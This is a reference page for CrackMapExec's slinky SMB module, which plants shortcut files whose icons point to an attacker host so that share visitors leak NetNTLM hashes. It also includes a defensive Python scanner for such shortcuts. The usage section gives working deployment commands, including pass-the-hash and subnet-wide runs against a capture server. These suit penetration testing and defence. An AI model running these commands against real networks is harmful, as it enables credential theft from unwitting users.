CrackMapExec Slinky (smb)


This page contains detailed information about how to use the slinky CME module with the smb protocol. For a list of all CrackMapExec modules, visit the CrackMapExec Module Library.

Description


This module creates a Windows shortcut (.LNK file) with a specially crafted icon attribute on all remote writable shares. The icon attribute points to an arbitrary UNC path, ideally the attacker's machine. Afterwards, anyone who visits the shared folder (with the .LNK file inside) will automatically try to authenticate against the specified SERVER (to load the icon) and send their NetNTLM hash. The attacker can then capture the NetNTLM hash (e.g. by using Responder or the auxiliary/server/capture/smb Metasploit module) and crack it.

The slinky module is OPSEC unsafe, which means that it may touch the disk and can therefore trigger an alarm.
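Because the technique leaves a file on every writable share, a defender can audit shares for shortcuts whose icon resolves to a UNC path. The following is an added example, not code from CrackMapExec or from the original page: it reads the ICON_LOCATION string of each .lnk file following the MS-SHLLINK layout and reports UNC icon paths. The function names are chosen here, the ANSI code page is assumed to be cp1252, and icon paths stored only in extra data blocks are not checked.

```python
import struct
import sys
from pathlib import Path

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # ShellLink CLSID
HAS_IDLIST, HAS_LINKINFO, HAS_ICON, IS_UNICODE = 0x01, 0x02, 0x40, 0x80
STRING_BITS = (0x04, 0x08, 0x10, 0x20, HAS_ICON)  # name, relpath, workdir, args, icon

def icon_location(data: bytes):
    """Return the ICON_LOCATION string of a shell link, or None if absent/invalid."""
    if len(data) < 76 or data[:4] != b"\x4c\0\0\0" or data[4:20] != LNK_CLSID:
        return None
    flags, pos = struct.unpack_from("<I", data, 20)[0], 76
    try:
        if flags & HAS_IDLIST:    # 2-byte size, then the ID list
            pos += 2 + struct.unpack_from("<H", data, pos)[0]
        if flags & HAS_LINKINFO:  # 4-byte size that includes itself
            pos += struct.unpack_from("<I", data, pos)[0]
        for bit in STRING_BITS:   # StringData entries appear in this fixed order
            if not flags & bit:
                continue
            count = struct.unpack_from("<H", data, pos)[0]
            size = count * 2 if flags & IS_UNICODE else count
            raw = data[pos + 2:pos + 2 + size]
            pos += 2 + size
            if bit == HAS_ICON:   # cp1252 for ANSI strings is an assumption
                return raw.decode("utf-16-le" if flags & IS_UNICODE else "cp1252", "replace")
    except struct.error:          # truncated file
        return None
    return None

def is_remote_icon(data: bytes) -> bool:
    """True when the icon path is UNC-style, so loading it contacts a remote host."""
    icon = icon_location(data)
    return bool(icon) and icon.startswith(("\\\\", "//"))

def scan(root):
    """Return [(path, icon)] for every shortcut under root with a UNC icon path."""
    links = (p for p in Path(root).rglob("*") if p.suffix.lower() == ".lnk" and p.is_file())
    return [(str(p), icon_location(p.read_bytes())) for p in links if is_remote_icon(p.read_bytes())]

def constructed_sample(icon: str) -> bytes:
    """Constructed test input: bare header plus a Unicode ICON_LOCATION entry."""
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, HAS_ICON | IS_UNICODE).ljust(76, b"\0")
    return header + struct.pack("<H", len(icon)) + icon.encode("utf-16-le")

if __name__ == "__main__":
    for path, icon in scan(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{path}: icon -> {icon}")
```

Run it against a mounted share or a local copy of one, passing the directory as the first argument; every hit is a shortcut worth inspecting and, if unexpected, removing.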

Supported Protocols


  • smb

Module Source Code


Authors


Module Options


Here is a complete list of slinky module options:

# cme smb -M slinky --options
[*] slinky module options:

        SERVER        IP of the SMB server
        NAME          LNK file name
        CLEANUP       Cleanup (choices: True or False)

The SERVER and NAME options are required! Make sure to set them when using this module.

Module Usage


This is how to use the slinky module while using the smb protocol:

Syntax:
# cme smb <TARGET[s]> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -M slinky -o SERVER=<host> -o NAME=<name>

Local admin:
# cme smb 10.0.5.1 -u Administrator -p P@ss123 -d . -M slinky -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.1 -u Administrator -p P@ss123 --local-auth -M slinky -o SERVER=10.0.6.11 -o NAME=test

Domain user:
# cme smb 10.0.5.1 -u bkpadmin -p P@ss123 -d target.corp -M slinky -o SERVER=10.0.6.11 -o NAME=test

CrackMapExec also supports passing the hash, so you can specify an NTLM hash instead of a password:

# cme smb 10.0.5.1 -u Administrator -H 432b022dc22aa5afe884e986b8383ff2 -d . -M slinky -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.1 -u bkpadmin -H 432b022dc22aa5afe884e986b8383ff2 -d target.corp -M slinky -o SERVER=10.0.6.11 -o NAME=test

The slinky module can also be used against multiple hosts. Here's how to run it against multiple hosts:

# cme smb target_list.txt -u Administrator -p P@ss123 -d . -M slinky -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.0/24 -u Administrator -p P@ss123 -d . -M slinky -o SERVER=10.0.6.11 -o NAME=test
# cme smb 10.0.5.1-100 -u Administrator -p P@ss123 -d . -M slinky -o SERVER=10.0.6.11 -o NAME=test

References


Version


This page has been created based on CrackMapExec version 5.1.7dev.
Visit CrackMapExec Module Library for more modules.